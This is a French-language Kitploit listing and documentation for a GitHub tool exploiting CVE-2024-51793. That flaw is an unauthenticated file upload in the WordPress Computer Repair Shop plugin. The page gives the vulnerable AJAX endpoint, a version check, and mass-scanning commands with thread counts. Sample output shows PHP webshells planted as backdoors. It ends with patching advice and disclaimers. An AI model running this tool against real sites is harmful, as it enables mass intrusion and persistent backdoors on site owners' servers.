Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-51793 — Exploite le téléchargement de fichiers arbitraire non authentifié CVE-2024-51793 dans le plugin WordPress Computer Repair Shop, scanne les listes de cibles, télécharge des webshells PHP et signale les sites vulnérables. | Kitploit
Outils/GitHubGitHub/0axz-tools/cve-2024-51793
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHub0axz-tools/cve-2024-51793

CVE-2024-51793

Exploite le téléchargement de fichiers arbitraire non authentifié CVE-2024-51793 dans le plugin WordPress Computer Repair Shop, scanne les listes de cibles, télécharge des webshells PHP et signale les sites vulnérables.

Voir le dépôt
49il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Documentation de l'outil d'exploitation CVE-2024-51793

📋 Aperçu

CVE-2024-51793 est une vulnérabilité de téléchargement arbitraire de fichiers non authentifié dans le plugin WordPress Computer Repair Shop (versions antérieures à 3.8116). Cette vulnérabilité permet à des attaquants de télécharger des fichiers arbitraires, y compris des webshells PHP, sans authentification, conduisant à une exécution de code à distance sur les sites WordPress vulnérables.

🚨 Détails de la vulnérabilité

CVE ID : CVE-2024-51793

Type de vulnérabilité : Téléchargement arbitraire de fichiers non authentifié

Plugin affecté : Plugin WordPress Computer Repair Shop

Versions affectées : < 3.8116

Niveau de risque : Critique (Score CVSS : 9.8)

🔧 Détails techniques

La vulnérabilité réside dans le gestionnaire d'action wc_upload_file_ajax du plugin, qui ne valide pas correctement les types de fichiers et l'authentification des utilisateurs, permettant à des attaquants non authentifiés de télécharger des fichiers malveillants directement sur le serveur.

📦 Installation et prérequis

Prérequis

Python 3.6+

Paquets requis : requests

Installation

bash

Clonez ou téléchargez le script

git clone cd cve-2024-51793-exploit

Installez les paquets requis

pip install requests

Ou si vous avez requirements.txt

pip install -r requirements.txt

🛠️ Guide d'utilisation

Utilisation de base

bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50

Utilisation avancée

bash

Avec un répertoire de sortie personnalisé

python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results

Avec sortie détaillée (si implémentée)

python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose

Arguments en ligne de commande

ArgumentCourtDescriptionPar défaut
--list-lChemin vers le fichier contenant les URL cibles (obligatoire)-
--threads-tNombre de threads concurrents50
--output-oRépertoire de sortie pour les résultatsresults

Format du fichier d'entrée

Créez un fichier texte (targets.txt) avec une URL par ligne :

text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog

🔍 Fonctionnement

  1. Validation de la cible
    Le script vérifie d'abord si la cible exécute la version vulnérable du plugin en examinant :

    text /wp-content/plugins/computer-repair-shop/readme.txt

  2. Détection de version
    Il vérifie que le plugin contient "CRM WordPress Plugin" et que la version est inférieure à 3.8116.

  3. Exploitation
    Si vulnérable, le script télécharge un webshell PHP via :

    text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax

  4. Charge utile du webshell
    Le webshell téléchargé fournit :

    • Capacité de téléchargement de fichiers
    • Gestion de base des fichiers
    • Accès persistant (backdoor)

📊 Fichiers de sortie

L'outil génère deux fichiers de sortie principaux :

  • vulnerable_targets.txt - Liste des URL confirmées vulnérables
  • webshells.txt - Liste des URL de webshells téléchargés avec succès

🎯 Exemple d'exécution

bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  CVE-2024-51793 Exploit Tool                                ║
║  Unauthenticated RCE in Computer Repair Shop WP Plugin      ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads

[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php

[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/

[ COMPLETED ] Scan finished successfully

🛡️ Mesures défensives

Pour les propriétaires de sites web

Actions immédiates :

  • Mettez à jour le plugin Computer Repair Shop vers la version 3.8116 ou ultérieure
  • Supprimez tout fichier malveillant téléchargé
  • Scannez les compromissions existantes

Mesures préventives :

  • Implémentez des pare-feu applicatifs (WAF)
  • Effectuez des audits de sécurité réguliers
  • Mettez en place une surveillance de l'intégrité des fichiers

Pour les chercheurs en sécurité

  • Utilisez uniquement dans des environnements autorisés
  • Suivez les pratiques de divulgation responsable
  • Obtenez les autorisations appropriées avant de tester

⚠️ Considérations légales et éthiques

  • Cet outil est à usage éducatif et pour les tests de sécurité autorisés uniquement
  • L'utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire est illégale
  • Obtenez toujours une autorisation appropriée avant d'effectuer des tests d'intrusion
  • Suivez les pratiques de divulgation responsable pour les vulnérabilités découvertes

🔄 Maintenance

Mises à jour

Vérifiez régulièrement :

  • Les mises à jour et améliorations du script
  • Les changements dans l'état de la vulnérabilité
  • Les nouvelles méthodes de détection

Dépannage

Problèmes courants et solutions :

  • Délais de connexion : Augmentez les valeurs de timeout dans la configuration de session
  • Faux négatifs : Vérifiez que les URL cibles sont accessibles
  • Limitation de débit : Réduisez le nombre de threads et ajoutez des délais

📞 Support

Pour les problèmes et améliorations :

  • Créez des issues sur le dépôt du projet
  • Contact : TG: @KtN_1990

📚 Références

  • Entrée officielle CVE-2024-51793
  • Annuaire des plugins WordPress
  • [Références d'avis de sécurité]

Avertissement : Cet outil doit être utilisé uniquement pour la recherche en sécurité légitime et les tests d'intrusion autorisés. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.

Télécharger l’outil